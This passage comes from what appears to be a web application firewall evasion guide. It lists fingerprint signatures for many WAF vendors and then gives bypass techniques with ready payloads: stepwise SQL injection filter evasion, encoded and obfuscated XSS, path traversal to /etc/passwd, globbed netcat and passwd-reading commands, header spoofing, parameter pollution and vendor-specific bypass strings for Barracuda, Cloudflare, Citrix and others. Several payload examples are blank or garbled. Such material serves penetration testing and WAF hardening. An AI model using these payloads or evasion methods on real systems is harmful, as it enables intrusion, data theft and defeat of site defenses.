Detectability: Easy - Detection Methodology:
- Response page contains:
-
http://cdn.virusdie.ru/splash/firewallstop.png
picture. -
copy; Virusdie.ru
copyright notice. - Response page title contains
Virusdie
keyword. - Page metadata contains
name="FW_BLOCK"
keyword
WallArm
-
Detectability: Moderate - Detection Methodology:
-
Server
headers containnginx-wallarm
value.
WatchGuard IPS
-
Detectability: Easy - Detection Methodology:
-
Server
headers may containWatchGuard
field value. - Blocked response page contains:
-
Request denied by WatchGuard Firewall
text. -
WatchGuard Technologies Inc.
as footer.
WebARX Security
-
Detectability: Easy - Detection Methodology:
- Restricted to specifically WordPress sites only.
- Blocked response page contains:
-
This request has been blocked by WebARX Web Application Firewall
text. - Reference to
/wp-content/plugins/webarx/
directory where it is installed.
WebKnight
-
Detectability: Easy - Detection Methodology:
- Response headers contain
WebKnight
keyword. - Blocked response page contains:
-
WebKnight Application Firewall Alert
text warning. -
AQTRONIX WebKnight
text snippet. - Blocked response code returned is
999 No Hacking
. :p - Blocked response code returned is also
404 Hack Not Found
. :p
WebLand
-
Detectability: Easy - Detection Methodology:
-
Server
header containsApache Protected By WebLand WAF
keyword.
WebRay
-
Detectability: Easy - Detection Methodology:
-
Server
header containsWebRay-WAF
keyword. - Response headers may have
DrivedBy
field with valueRaySrv RayEng/{version}
.
WebSEAL
-
Detectability: Easy - Detection Methodology:
-
Server
header containWebSEAL
keyword. - Blocked response page contains:
-
This is a WebSEAL error message template file
text. -
WebSEAL server received an invalid HTTP request
text snippet.
WebTotem
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains
The current request was blocked by WebTotem
.
West263CDN
-
Detectability: Easy - Detection Methodology:
- Response headers contain
X-Cache
header field withWT263CDN
value.
Wordfence
-
Detectability: Easy - Detection Methodology:
- Response headers contain
WebKnight
keyword. - Blocked response page contains:
-
Generated by Wordfence
text snippet. -
A potentially unsafe operation has been detected in your request to this site
text warning. -
Your access to this site has been limited
text warning. -
This response was generated by Wordfence
text snippet.
WTS-WAF
-
Detectability: Easy - Detection Methodology:
- Blocked response page title has
WTS-WAF
keyword. -
Server
header containswts
as value.
XLabs Security WAF
-
Detectability: Easy - Detection Methodology:
- Response headers contain
X-CDN
header field withXLabs Security
value.
Xuanwudun WAF
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains reference to
http://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/
site URL.
Yunaq Chuangyu
-
Detectability: Moderate - Detection Methodology:
- Response page has reference to:
-
365cyd.com
or365cyd.net
URL. - Reference to help page at
http://help.365cyd.com/cyd-error-help.html?code=403
.
-
Yundun
-
Detectability: Easy - Detection Methodology:
-
Server
header containsYUNDUN
as value. -
X-Cache
header field containsYUNDUN
as value. - Response page contains
Blocked by YUNDUN Cloud WAF
text snippet. - Blocked response page contains reference to
yundun.com/yd_http_error/
URL.
Yunsuo
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains image class reference to
yunsuologo
. - Response headers contain the
yunsuo_session
field name.
YxLink
-
Detectability: Easy - Detection Methodology:
- Response might have
yx_ci_session
cookie field. - Response might have
yx_language
cookie field. -
Server
header containsYxlink-WAF
field value.
ZenEdge
-
Detectability: Easy - Detection Methodology:
- Blocked response page contains reference to
/__zenedge/assets/
directory. -
Server
header containZENEDGE
keyword. - Blocked response headers may contain
X-Zen-Fury
header.
ZScaler
-
Detectability: Easy - Detection Methodology:
-
Server
header has value set toZScaler
. - Blocked response page contains:
-
Access Denied: Accenture Policy
text. - Reference to
https://policies.accenture.com
URL. - Reference to image at
https://login.zscloud.net/img_logo_new1.png
. -
Your organization has selected Zscaler to protect you from internet threats
. -
The Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate
.
-
## Evasion Techniques
Lets look at some methods of bypassing and evading WAFs.
### Fuzzing/Bruteforcing:
#### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing
- [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
- [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
- [Other Payloads](https://github.com/foospidy/payloads)
#### Technique:
- Load up your wordlist into fuzzer and start the bruteforce.
- Record/log all responses from the different payloads fuzzed.
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
- If blocking noticed, increase fuzz latency (eg. 2-4 secs).
- Always use proxychains, since chances are real that your IP gets blocked.
#### Drawbacks:
- This method often fails.
- Many a times your IP will be blocked (temporarily/permanently).
### Regex Reversing:
#### Method:
- Most efficient method of bypassing WAFs.
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
- Payload matches the reg-ex the WAF triggers alarm.
#### Techniques:
### Blacklisting Detection/Bypass
- In this method we try to fingerprint the rules step by step by observing the keywords being blacklisted.
- The idea is to guess the regex and craft the next payloads which doesn't use the blacklisted keywords.
__Case__: SQL Injection
##### • Step 1:
__Keywords Filtered__: `and`, `or`, `union`
__Probable Regex__: `preg_match('/(and|or|union)/i', $id)`
- __Blocked Attempt__: `union select user, password from users`
- __Bypassed Injection__: `1 || (select user from users where user_id = 1) = 'admin'`
##### • Step 2:
__Keywords Filtered__: `and`, `or`, `union`, `where`
- __Blocked Attempt__: `1 || (select user from users where user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users limit 1) = 'admin'`
##### • Step 3:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`
- __Blocked Attempt__: `1 || (select user from users limit 1) = 'admin'`
- __Bypassed Injection__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
##### • Step 4:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`
- __Blocked Attempt__: `1 || (select user from users group by user_id having user_id = 1) = 'admin'`
- __Bypassed Injection__: `1 || (select substr(group_concat(user_id),1,1) user from users ) = 1`
##### • Step 5:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`
- __Blocked Attempt__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || 1 = 1 into outfile 'result.txt'`
- __Bypassed Injection__: `1 || substr(user,1,1) = 'a'`
##### • Step 6:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`
- __Blocked Attempt__: `1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1`
- __Bypassed Injection__: `1 || user_id is not null`
- __Bypassed Injection__: `1 || substr(user,1,1) = 0x61`
- __Bypassed Injection__: `1 || substr(user,1,1) = unhex(61)`
##### • Step 7:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`
- __Blocked Attempt__: `1 || substr(user,1,1) = unhex(61)`
- __Bypassed Injection__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
##### • Step 8:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`
- __Blocked Attempt__: `1 || substr(user,1,1) = lower(conv(11,10,36))`
- __Bypassed Injection__: `1 || lpad(user,7,1)`
##### • Step 9:
__Keywords Filtered__: `and`, `or`, `union`, `where`, `limit`, `group by`, `select`, `'`, `hex`, `substr`, `white space`
- __Blocked Attempt__: `1 || lpad(user,7,1)`
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
### Obfuscation:
#### Method:
- Encoding payload to different encodings (a hit and trial approach).
- You can encode whole payload, or some parts of it and test recursively.
#### Techniques:
__1. Case Toggling__
- Some poorly developed WAFs filter selectively specific case WAFs.
- We can combine upper and lower case characters for developing efficient payloads.
__Standard__: `alert()`
__Bypassed__: `alert()`
__Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'`
__Bypassed__: `sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'`
__2. URL Encoding__
- Encode normal payloads with % encoding/URL encoding.
- Can be done with online tools like [this](https://www.url-encode-decode.com/).
- Burp includes a in-built encoder/decoder.
__Blocked__: `"/oNloaD=confirm()//`
__Bypassed__: `%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F`
__Blocked__: `uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)`
__Bypassed__: `uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29`
__3. Unicode Normalization__
- ASCII characters in unicode encoding encoding provide great variants for bypassing.
- You can encode entire/part of the payload for obtaining results.
__Standard__: ``
__Obfuscated__: ``
__Blocked__: `/?redir=http://google.com`
__Bypassed__: `/?redir=http://google。com` (Unicode alternative)
__Blocked__: `x`
__Bypassed__: `<marquee loop=1 onfinish=alert︵1)>x` (Unicode alternative)
> __TIP:__ Have a look at [this](https://hackerone.com/reports/231444) and [this](https://hackerone.com/reports/231389) reports on HackerOne. :)
__Standard__: `../../etc/passwd`
__Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd`
__4. HTML Representation__
- Often web apps encode special characters into HTML encoding and render them accordingly.
- This leads us to basic bypass cases with HTML encoding (numeric/generic).
__Standard__: `">`
__Encoded__: `"><img src=x onerror=confirm()>` (General form)
__Encoded__: `"><img src=x onerror=confirm()>` (Numeric reference)
__5. Mixed Encoding__
- Sometimes, WAF rules often tend to filter out a specific type of encoding.
- This type of filters can be bypassed by mixed encoding payloads.
- Tabs and newlines further add to obfuscation.
__Obfuscated__:
```
XSS
```
__6. Using Comments__
- Comments obfuscate standard payload vectors.
- Different payloads have different ways of obfuscation.
__Blocked__: `alert()`
__Bypassed__: `alert/**/()/**/`
__Blocked__: `/?id=1+union+select+1,2,3--`
__Bypassed__: `/?id=1+un/**/ion+sel/**/ect+1,2,3--`
__7. Double Encoding__
- Often WAF filters tend to encode characters to prevent attacks.
- However poorly developed filters (no recursion filters) can be bypassed with double encoding.
__Standard__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
__Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
__Standard__: `alert()`
__Obfuscated__: `%253Cscript%253Ealert()%253C%252Fscript%253E`
__8. Wildcard Obfuscation__
- Globbing patterns are used by various command-line utilities to work with multiple files.
- We can tweak them to execute system commands.
- Specific to remote code execution vulnerabilities on linux systems.
__Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: `/???/??t /???/??ss??`
Used chars: `/ ? t s`
__Standard__: `/bin/nc 127.0.0.1 1337`
__Obfuscated__: `/???/n? 2130706433 1337`
Used chars: `/ ? n [0-9]`
__9. Dynamic Payload Generation__
- Different programming languages have different syntaxes and patterns for concatenation.
- This allows us to effectively generate payloads that can bypass many filters and rules.
__Standard__: `alert()`
__Obfuscated__: `eval('al'+'er'+'t()')`
__Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`
> Bash allows path concatenation for execution.
__Standard__: ``
__Obfuscated__: ``
__9. Junk Characters__
- Normal payloads get filtered out easily.
- Adding some junk chars helps avoid detection (specific cases only).
- They often help in confusing regex based firewalls.
__Standard__: `alert()`
__Obfuscated__: `+-+-1-+-+alert(1)`
__Standard__: ``
__Obfuscated__: ``````
> __NOTE:__ The above payload can break the regex parser to cause an exception.
__Standard__: `ClickMe `
__Bypassed__: `ClickMe`
__10. Line Breaks__
- Many WAF with regex based filtering effectively blocks many attempts.
- Line breaks (CR/LF) can break firewall regex and bypass stuff.
__Standard__: ``
__Obfuscated__: ``
__11. Uninitialized Variables__
- Uninitialized bash variables can evade bad regular expression based filters and pattern match.
- These have value equal to null/they act like empty strings.
- Both bash and perl allow this kind of interpretations.
> __BONUS:__ Variable names can have any number of random characters. I have represented them here as `$aaaaaa`, `$bbbbbb`, and so on. You can replace them with any number of random chars like `$ushdjah` and so on. ;)
- __Level 1 Obfuscation__: Normal
__Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: `/bin/cat$u /etc/passwd$u`
- __Level 2 Obfuscation__: Postion Based
__Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: $u/bin$u/cat$u $u/etc$u/passwd$u
- __Level 3 Obfuscation__: Random characters
__Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
An exotic payload crafted:
```
$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf
```
__12. Tabs and Line Feeds__
- Tabs often help to evade firewalls especially regex based ones.
- Tabs can help break firewall regex when the regex is expecting whitespaces and not tabs.
__Standard__: ``
__Bypassed__: ``
__Variant__: ``
__Standard__: `http://test.com/test?id=1 union select 1,2,3`
__Standard__: `http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3`
__Standard__: ``
__Obfuscated__:
```
```
__13. Token Breakers__
- Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
- However, the request must still remain valid while using token-breakers.
- __Case__: Unknown Token for the Tokenizer
- __Payload__: `?id=‘-sqlite_version() UNION SELECT password FROM users --`
- __Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
- __Payload 1__: `?id=123);DROP TABLE users --`
- __Payload 2__: `?id=1337) INTO OUTFILE ‘xxx’ --`
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).
__14. Obfuscation in Other Formats__
- Many web applications support different encoding types and can interpret the encoding (see below).
- Obfuscating our payload to a format not supported by WAF but the server can smuggle our payload in.
__Case:__ IIS
- IIS6, 7.5, 8 and 10 (ASPX v4.x) allow __IBM037__ character interpretations.
- We can encode our payload and send the encoded parameters with the query.
Original Request:
```
POST /sample.aspx?id1=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41
id2='union all select * from users--
```
Obfuscated Request + URL Encoding:
```
POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115
%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
```
The following table shows the support of different character encodings on the tested systems (when messages could be obfuscated using them):
> __TIP:__ You can use [this small python script](others/obfu.py) to convert your payloads and parameters to your desired encodings.
Target
Encodings
Notes
Nginx, uWSGI-Django-Python3
IBM037, IBM500, cp875, IBM1026, IBM273
- Query string and body need to be encoded.
- Url-decoded parameters in query string and body.
- Equal sign and ampersand needed to be encoded as well (no url-encoding).
Nginx, uWSGI-Django-Python2
IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424
- Query string and body need to be encoded.
- Url-decoded parameters in query string and body afterwards.
- Equal sign and ampersand should not be encoded in any way.
Apache-TOMCAT8-JVM1.8-JSP
IBM037, IBM500, IBM870, cp875, IBM1026,
IBM01140, IBM01141, IBM01142, IBM01143, IBM01144,
IBM01145, IBM01146, IBM01147, IBM01148, IBM01149,
utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278,
IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,
IBM424, IBM-Thai, IBM871, cp1025
- Query string in its original format (could be url-encoded as usual).
- Body could be sent with/without url-encoding.
- Equal sign and ampersand should not be encoded in any way.
Apache-TOMCAT7-JVM1.6-JSP
IBM037, IBM500, IBM870, cp875, IBM1026,
IBM01140, IBM01141, IBM01142, IBM01143, IBM01144,
IBM01145, IBM01146, IBM01147, IBM01148, IBM01149,
utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278,
IBM280, IBM284, IBM285, IBM297, IBM420, IBM424,
IBM-Thai, IBM871, cp1025
- Query string in its original format (could be url-encoded as usual).
- Body could be sent with/without url-encoding.
- Equal sign and ampersand should not be encoded in any way.
IIS6, 7.5, 8, 10 -ASPX (v4.x)
IBM037, IBM500, IBM870, cp875, IBM1026,
IBM01047, IBM01140, IBM01141, IBM01142, IBM01143,
IBM01144, IBM01145, IBM01146, IBM01147, IBM01148,
IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE,
IBM273, IBM277, IBM278, IBM280, IBM284, IBM285,
IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended,
IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025
- Query string in its original format (could be url-encoded as usual).
- Body could be sent with/without url-encoding.
- Equal sign and ampersand should not be encoded in any way.
### HTTP Parameter Pollution
#### Method:
- This attack method is based on how a server interprets parameters with the same names.
- Possible bypass chances here are:
- The server uses the last received parameter, and WAF checks only the first.
- The server unites the value from similar parameters, and WAF checks them separately.
#### Technique:
- The idea is to enumerate how the parameters are being interpreted by the server.
- In such a case we can pass the payload to a parameter which isn't being inspected by the WAF.
- Distributing a payload across parameters which can later get concatenated by the server is also useful.
Below is a comparison of different servers and their relative interpretations:
Environment
Parameter Interpretation
Example
ASP/IIS
Concatenation by comma
par1=val1,val2
JSP, Servlet/Apache Tomcat
First parameter is resulting
par1=val1
ASP.NET/IIS
Concatenation by comma
par1=val1,val2
PHP/Zeus
Last parameter is resulting
par1=val2
PHP/Apache
Last parameter is resulting
par1=val2
JSP, Servlet/Jetty
First parameter is resulting
par1=val1
IBM Lotus Domino
First parameter is resulting
par1=val1
IBM HTTP Server
Last parameter is resulting
par1=val2
mod_perl, libapeq2/Apache
First parameter is resulting
par1=val1
Oracle Application Server 10G
First parameter is resulting
par1=val1
Perl CGI/Apache
First parameter is resulting
par1=val1
Python/Zope
First parameter is resulting
par1=val1
IceWarp
An array is returned
['val1','val2']
AXIS 2400
Last parameter is resulting
par1=val2
DBMan
Concatenation by two tildes
par1=val1~~val2
mod-wsgi (Python)/Apache
An array is returned
ARRAY(0x8b9058c)
### HTTP Parameter Fragmentation
- HPF is based on the principle where the server unites the value being passed along the parameters.
- We can split the payload into different components and then pass the values via the parameters.
__Sample Payload__: `1001 RLIKE (-(-1)) UNION SELECT 1 FROM CREDIT_CARDS`
__Sample Query URL__: `http://test.com/url?a=1001+RLIKE&b=(-(-1))+UNION&c=SELECT+1&d=FROM+CREDIT_CARDS`
> __TIP:__ A real life example how bypasses can be crafted using this method can be found [here](http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2009-August/005673.html).
### Browser Bugs:
#### Charset Bugs:
- We can try changing charset header to higher Unicode (eg. UTF-32) and test payloads.
- When the site decodes the string, the payload gets triggered.
Example request:
GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept-Charset:utf-32; q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
then as the output encoding of the page is UTF-8, it will be rendered as: `"alert (1) </ script>` which will trigger XSS.
Final URL encoded payload:
```
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
```
#### Null Bytes:
- The null bytes are commonly used as string terminator.
- This can help us evade many web application filters in case they are not filtering out the null bytes.
Payload examples:
```
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
```
__Standard__: `<a href="javascript:alert()">`
__Obfuscated__: `<a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>`
__Variant__: `<a 0x00 href="javascript:alert(1)">clickme</a>`
#### Parsing Bugs:
- RFC states that NodeNames cannot begin with whitespace.
- But we can use special chars like ` %`, `//`, `!`, `?`, etc.
Examples:
- `<// style=x:expression\28write(1)\29>` - Works upto IE7 _([Source](http://html5sec.org/#71))_
- `<!--[if]><script>alert(1)` - Works upto IE9 _([Reference](http://html5sec.org/#115))_
- `` - Works in IE7 _([Reference](http://html5sec.org/#77))_
- `<%div%20style=xss:expression(prompt(1))>` - Works Upto IE7
#### Unicode Separators:
- Every browser has their own specific charset of separators.
- We can fuzz charset range of `0x00` to `0xFF` and get the set of separators for each browser.
- We can use these separators in places where a space is required.
Here is a compiled list of separators by [@Masato Kinugawa](https://github.com/masatokinugawa):
- IExplorer: `0x09`, `0x0B`, `0x0C`, `0x20`, `0x3B`
- Chrome: `0x09`, `0x20`, `0x28`, `0x2C`, `0x3B`
- Safari: `0x2C`, `0x3B`
- FireFox: `0x09`, `0x20`, `0x28`, `0x2C`, `0x3B`
- Opera: `0x09`, `0x20`, `0x2C`, `0x3B`
- Android: `0x09`, `0x20`, `0x28`, `0x2C`, `0x3B`
An exotic payload example:
```
pwn3d
```
### Using Atypical Equivalent Syntactic Structures
- This method aims at finding a way of exploitation not considered by the WAF developers.
- Some use cases can be twitched to critical levels where the WAF cannot detect the payloads at all.
- This payload is accepted and executed by the server after going through the firewall.
Some common keywords overlooked by WAF developers:
- JavaScript functions:
- `window`
- `parent`
- `this`
- `self`
- Tag attributes:
- `onwheel`
- `ontoggle`
- `onfilterchange`
- `onbeforescriptexecute`
- `ondragstart`
- `onauxclick`
- `onpointerover`
- `srcdoc`
- SQL Operators
- `lpad`
- `field`
- `bit_count`
Example Payloads:
- __Case:__ XSS
```
window['alert'](0)
parent['alert'](1)
self['alert'](2)
```
- __Case:__ SQLi
```
SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
1%0b||%0bLPAD(USER,7,1)
```
Many alternatives to the original JavaScript can be used, namely:
- [JSFuck](http://www.jsfuck.com/)
- [JJEncode](http://utf-8.jp/public/jjencode.html)
- [XChars.JS](https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html)
> However the problem in using the above syntactical structures is the long payloads which might possibly be detected by the WAF or may be blocked by the CSP. However, you never know, they might bypass the CSP (if present) too. ;)
### Abusing SSL/TLS Ciphers:
- Many a times, servers do accept connections from various SSL/TLS ciphers and versions.
- Using a cipher to initialise a connection to server which is not supported by the WAF can do our workload.
#### Technique:
- Dig out the ciphers supported by the firewall (usually the WAF vendor documentation discusses this).
- Find out the ciphers supported by the server (tools like [SSLScan](https://github.com/rbsec/sslscan) helps here).
- If a specific cipher not supported by WAF but by the server, is found, voila!
- Initiating a new connection to the server with that specific cipher should smuggle our payload in.
> __Tool__: [abuse-ssl-bypass-waf](https://github.com/LandGrey/abuse-ssl-bypass-waf)
```
python abuse-ssl-bypass-waf.py -thread 4 -target
```
CLI tools like cURL can come very handy for PoCs:
```
curl --ciphers -G -d
```
### Abuse WAF limit on HTTP Responses
#### Method
- Many a times, WAFs have a limit on _how much_ of the HTTP request they are meant to handle.
- By sending a HTTP request with a size __greater than the limit__, we can fully evade WAFs.
#### Technique
- Use a hit and trial approach to find out how much of the HTTP request is being inspected by the WAF (usually in multiples of 4 kB).
- Once done, attach your payload to the request after filling the limit with garbage.
> A similar technique was used to [bypass Google Cloud Platform WAF](https://kloudle.com/blog/piercing-the-cloud-armor-the-8kb-bypass-in-google-cloud-platform-waf).
### Abusing DNS History:
- Often old historical DNS records provide information about the location of the site behind the WAF.
- The target is to get the location of the site, so that we can route our requests directly to the site and not through the WAF.
> __TIP:__ Some online services like [IP History](http://www.iphistory.ch/en/) and [DNS Trails](https://securitytrails.com/dns-trails) come to the rescue during the recon process.
__Tool__: [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
```
bash bypass-firewalls-by-DNS-history.sh -d --checkall
```
### Using Whitelist Strings:
#### Method:
- Some WAF developers keep a shared secret with their users/devs which allows them to pass harmful queries through the WAF.
- This shared secret, if leaked/known, can be used to bypass all protections within the WAF.
#### Technique:
- Using the whitelist string as a parameter in GET/POST/PUT/DELETE requests smuggles our payload through the WAF.
- Usually some `*-sync-request` keywords or a shared token value is used as the secret.
- Often adding specific headers may trigger a similar whitelist behaviour.
Now when making a request to the server, you can append it as a parameter:
```
http://host.com/?randomparameter=&=True
```
> A real life example how this works can be found at [this blog](https://osandamalith.com/2019/10/12/bypassing-the-webarx-web-application-firewall-waf/).
### Request Header Spoofing:
#### Method:
- The target is to fool the WAF/server into believing it was from their internal network.
- Adding some spoofed headers to represent the internal network, does the trick.
#### Technique:
- With each request some set of headers are to be added simultaneously thus spoofing the origin.
- The upstream proxy/WAF misinterprets the request was from their internal network, and lets our gory payload through.
Some common headers used:
```
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
```
### Google Dorks Approach:
#### Method:
- There are a lot of known bypasses of various web application firewalls ([see section](#known-bypasses)).
- With the help of google dorks, we can easily find bypasses.
#### Techniques:
Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](http://pdf.textfiles.com/security/googlehackers.pdf).
- Normal search:
`+ waf bypass`
- Searching for specific version exploits:
`" " (bypass|exploit)`
- For specific type bypass exploits:
`"" + (bypass|exploit)`
- On [Exploit DB](https://exploit-db.com):
`site:exploit-db.com + bypass`
- On [0Day Inject0r DB](https://0day.today):
`site:0day.today + (bypass|exploit)`
- On [Twitter](https://twitter.com):
`site:twitter.com + bypass`
- On [Pastebin](https://pastebin.com)
`site:pastebin.com + bypass`
## Known Bypasses:
### Airlock Ergon
- SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by [@Sec Consult](https://www.exploit-db.com/?author=1614)
```
%C0%80'+union+select+col1,col2,col3+from+table+--+
```
### AWS
- [SQLi Bypass](https://github.com/enkaskal/aws-waf-sqli-bypass-PoC) by [@enkaskal](https://twitter.com/enkaskal)
```
"; select * from TARGET_TABLE --
```
- [XSS Bypass](https://github.com/kmkz/Pentesting/blob/master/Pentest-Cheat-Sheet#L285) by [@kmkz](https://twitter.com/kmkz_security)
```
eval(atob(decodeURIComponent("payload")))//
```
### Barracuda
- Cross Site Scripting by [@WAFNinja](https://waf.ninja)
```
<body style="height:1000px" onwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
```
- HTML Injection by [@Global-Evolution](https://www.exploit-db.com/?author=2016)
```
GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
```
- XSS Bypass by [@0xInfection](https://twitter.com/0xInfection)
```
<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
```
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
### Cerber (WordPress)
- Username Enumeration Protection Bypass by HTTP Verb Tampering by [@ed0x21son](https://www.exploit-db.com/?author=9901)
```
POST host.com HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
author=1
```
- Protected Admin Scripts Bypass by [@ed0x21son](https://www.exploit-db.com/?author=9901)
```
http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils
http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar
```
- REST API Disable Bypass by [@ed0x21son](https://www.exploit-db.com/?author=9901)
```
http://host/index.php/wp-json/wp/v2/users/
```
### Citrix NetScaler
- SQLi via HTTP Parameter Pollution (NS10.5) by [@BGA Security](https://www.exploit-db.com/?author=7396)
```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string>’ union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
```
- [`generic_api_call.pl` XSS](https://www.exploit-db.com/exploits/30777) by [@NNPoster](https://www.exploit-db.com/?author=6654)
```
http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
```
### Cloudflare
- [XSS Bypass](https://twitter.com/SalahHasoneh1/status/1281254703360344064) by [@@SalahHasoneh1](https://twitter.com/@SalahHasoneh1)
```
<svg onx=() onload=(confirm)(1)>
```
- [XSS Bypass](https://pastebin.com/i8Ans4d4) by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
```
- [XSS Bypasses](https://twitter.com/h1_ragnar) by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar)
```
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
